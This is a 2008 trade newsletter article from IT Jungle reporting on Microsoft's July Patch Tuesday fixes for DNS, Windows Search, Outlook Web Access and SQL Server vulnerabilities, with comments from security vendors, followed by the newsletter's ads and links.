Volume 6, Number 26 -- July 9, 2008

Microsoft Patches Security Flaws in Windows, SQL Server, and Exchange

Published: July 9, 2008

by Alex Woodie

Microsoft published four patches for nine security vulnerabilities in Windows and other products yesterday during its monthly Patch Tuesday event. All of the flaws carry the rating of "important," which is a step below "critical" in Microsoft's severity rating system. Nevertheless, newly disclosed flaws in Exchange Server and SQL Server could open the door to potentially harmful attacks from internal and external threats, and as such they should not be taken lightly.

Two flaws in Windows' implementation of the Domain Name System (DNS) protocol that could leave users open to spoofing attacks were patched with MS08-037. The flaws, which affect both client and server DNS components, could allow attackers to redirect Internet traffic to locations of their choosing by sending specially crafted DNS packets to an affected Windows 2000, Windows XP, or Windows Server 2003 system. Microsoft says neither of the flaws have been publicly revealed before yesterday, and neither of them are being actively exploited in the wild. Dan Kaminsky of the computer security services firm IOActive is credited with discovering one of the flaws.

A remote code execution vulnerability in Windows Vista and Windows Server 2008 was fixed with MS08-038. A flaw in the way that Windows Explorer parses Windows Search files when saving them could enable an attacker to take complete control of a user's system by tricking the user into visiting a malformed Web site or opening a malicious document.

While remote code execution vulnerabilities are usually considered critical, in this case, the new user account control security feature of Vista and Windows Server 2008, where regular users run with fewer rights than the administrator, provide some protection from exploitation. This flaw had previously been publicly disclosed back in March, but is not being actively exploited, according to Microsoft.

Two cross-site scripting flaws in Outlook Web Access (OWA) that could give an attacker full access to a victim's e-mail account has been addressed with MS08-039. The elevation of privilege vulnerabilities are present in OWA running on Exchange Server 2003 Service Pack 2, Exchange Server 2007, and Exchange Server 2007 SP1. Neither of the flaws had previously been disclosed, nor have they been exploited in the wild, according to Microsoft. Michael Jordan of Context Information Security gets credit with reporting the flaws.

The OWA flaws could open the door to greater riches for a hacker, according to Tyler Reguly, a security engineer with nCircle, a provider of network security solutions. "These vulnerabilities offer great opportunity for an attacker to snoop for additional information before attempting to breach a company’s network security," he says.

The final patch, MS08-040, addresses four elevation of pillage flaws in all recent versions of SQL Server, including SQL Server 7.0, SQL Server 2000, SQL Server 2005, the Microsoft Data Engine (MSDE) 1.0, MSDE 2000, SQL Server 2000 Desktop Engine (WMSDE), and the Windows Internal Database (WYukon).

In the case of the SQL Server vulnerabilities, attackers must be authenticated to exploit these flaws. In the case of the Memory Page Reuse vulnerability, the attacker must already have the clearances of a computer operator, or access to backups or logs, to exploit the flaw. In other cases, the attacker must have a valid Windows logon, or clearance to submit SQL statements.

Nevertheless, with three of the flaws, an attacker who successfully exploited the vulnerability would gain complete control over the database--a catastrophic event from a security point of view. However, this would be fairly unlikely to happen, considering the pains most organizations take to protect their databases from external access.

Microsoft has traditionally focused on protecting its products from unauthenticated, external attacks. But the SQL vulnerabilities could indicate it has a bigger problem with internal threats than it first appeared, according to Reguly. "I wonder if perhaps Microsoft is failing to pay close enough attention to the authenticated vulnerabilities," he says. "This could mean there is, perhaps, a larger attack surface for insider threats than there is for outside attackers."

According to Don Leatham, director of solutions and strategy at patch management vendor Lumension Security, the potential harm from the SQL Server and Exchange Server flaws should not be underestimated.

"Both of these products can be high-value targets and these vulnerabilities could be considered critical depending on the organization," he says. "Many corporations hold not only their basic business information, but also their customer/patient data and critical intellectual property in Microsoft SQL Servers databases, or transmit these types of data via Microsoft Exchange servers. Companies that depend heavily on SQL and Exchange servers to manage and store customer or patient data and intellectual property should evaluate the criticality of these updates and possibly address them as a critical level security update."

                     Post this story to
               Post this story to Digg
    Post this story to Slashdot

Sponsored By

Meet Your IT Audit and Compliance Demands with MKS

One Seamless Solution for System i and Distributed Application Lifecycle Management

Are you struggling to meet IT audit and compliance demands?
Do you need traceability over software change?

When Pennsylvania Housing Finance Agency (PHFA) needed to achieve compliance, they turned to MKS for traceability over their software change. MKS Integrity enforces their development process and brings end to end traceability to their System i and distributed development operations.

Read the PHFA story.

MKS can help you establish and enforce any software process or workflow, and manage software change from project start to finish. With MKS you can ensure that the application you develop is deployed securely and that only authorized changes go into production.

For auditing and compliance needs, it doesn't get any better than MKS.

For more info, visit or call 1 800 613 7535.

Make the Move to MKS now and SAVE!

For a limited time MKS will help you make the move from your existing software change and configuration management solution, with special pricing when you purchase Implementer with MKS Integrity - giving you integrated workflow, complete audit trails and coverage of the application lifecycle as well as a platform to manage both System i and cross-platform development.

Visit the Products section of for more information on Implementer and MKS Integrity.

Click here to request more information on our time limited "change up" offer.

The time is now to make the switch.

Call MKS today at 1-800-613-7535 to discuss your options, and while you're at it,
request a FREE change management process assessment by our team of experts
with over 40 years of experience in the midrange market.

Contact MKS Sales at 1-800-613-7535 or

Editor: Alex Woodie
Contributing Editors: Dan Burger, Joe Hertvik,
Shannon O'Donnell, Timothy Prickett Morgan
Publisher and Advertising Director: Jenny Thomas
Advertising Sales Representative: Kim Reed
Contact the Editors: To contact anyone on the IT Jungle Team
Go to our contacts page and send us a message.

Sponsored Links

COMMON:  Join us at the annual 2009 conference, April 26 - April 30, in Reno, Nevada
Storage Guardian:  Remote backup services at a special rate of $8/compressed GB/month is the resource for job transitions after age 40



IT Jungle Store Top Book Picks

Getting Started with PHP for i5/OS: List Price, $59.95
The System i RPG & RPG IV Tutorial and Lab Exercises: List Price, $59.95
The System i Pocket RPG & RPG IV Guide: List Price, $69.95
The iSeries Pocket Database Guide: List Price, $59.00
The iSeries Pocket Developers' Guide: List Price, $59.00
The iSeries Pocket SQL Guide: List Price, $59.00
The iSeries Pocket Query Guide: List Price, $49.00
The iSeries Pocket WebFacing Primer: List Price, $39.00
Migrating to WebSphere Express for iSeries: List Price, $49.00
iSeries Express Web Implementer's Guide: List Price, $59.00
Getting Started with WebSphere Development Studio for iSeries: List Price, $79.95
Getting Started With WebSphere Development Studio Client for iSeries: List Price, $89.00
Getting Started with WebSphere Express for iSeries: List Price, $49.00
WebFacing Application Design and Development Guide: List Price, $55.00
Can the AS/400 Survive IBM?: List Price, $49.00
The All-Everything Machine: List Price, $29.95
Chip Wars: List Price, $29.95

The Four Hundred
The Power Systems 550 M50 Versus Its Predecessors

IBM Rejiggers Development Tools on Entry Power 520 i Editions

Job Word Cloud Redux: The AS/400 Sees Some Improvement

As I See It: The Digital Leader

WebSphere Portal Remains the Industry Leader, Says Gartner

The Linux Beacon
Xandros Continues Linux Buildout with Linspire Buy

Red Hat's Profit Growth Stalls in Fiscal Q1, RHEL MRG Launched

Gartner Revises HP's Server Sales Downward for Q1

As I See It: The Digital Leader

The Relational Database Market Grows Decently in 2007

Four Hundred Stuff
Vision Solutions Continues HA Evolution with ORION 6.0

CCSS Addresses MQSeries Monitoring Pain on i OS

NGS Launches Another BI Product for i OS

AMB Hooks Data Quality Tool into IBM DataStage

Varsity's i OS Shipping Software Certified by UPS

Big Iron
IBM v PSI: The Operation Was a Success, But the Patient Died

Top Mainframe Stories From Around the Web

Chats, Webinars, Seminars, Shows, and Other Happenings

Four Hundred Guru
Keeping Time with NTP

What Happened to My Key?

Stopping Your System i from Starting Up

System i PTF Guide
July 5, 2008: Volume 10, Number 27

June 28, 2008: Volume 10, Number 26

June 21, 2008: Volume 10, Number 25

June 14, 2008: Volume 10, Number 24

June 7, 2008: Volume 10, Number 23

May 31, 2008: Volume 10, Number 22

The Unix Guardian
HP Donates the Guts of Tru64 Unix's File System to Linux

Fujitsu Lands Monster Unix Deal with China Mobile

Virtual Servers Keep On A Rollin', Thanks to uptime software

As I See It: Flights of Fancy

Agilysys Hires JPMorgan for Possible Sale

Four Hundred Monitor
Four Hundred Monitor's
Full iSeries Events Calendar


Danik Consulting
Vibrant Technologies

Printer Friendly Version

Micro-Hoo Now Undead

Microsoft Patches Security Flaws in Windows, SQL Server, and Exchange

Hyper-V Goes RTM as VMware Hiccups

Microsoft Unveils New 'Select Plus' Volume Licensing Program

VMware Replaces Co-Founder Greene with Microsoft Hotshot

But Wait, There's More:

Micro Focus and Microsoft to Enhance COBOL Alternatives on Windows . . . Gartner Revises HP's Server Sales Downward for Q1 . . . The Relational Database Market Grows Decently in 2007 . . . Coming to Grips with Your Digital Landfill . . . Hitachi Upgrades BladeSymphony Blades with Latest Intel CPUs . . .

The Windows Observer


Subscription Information:
You can unsubscribe, change your email address, or sign up for any of IT Jungle's free e-newsletters through our Web site at

Copyright © 1996-2008 Guild Companies, Inc. All Rights Reserved.
Guild Companies, Inc., 50 Park Terrace East, Suite 8F, New York, NY 10034

Privacy Statement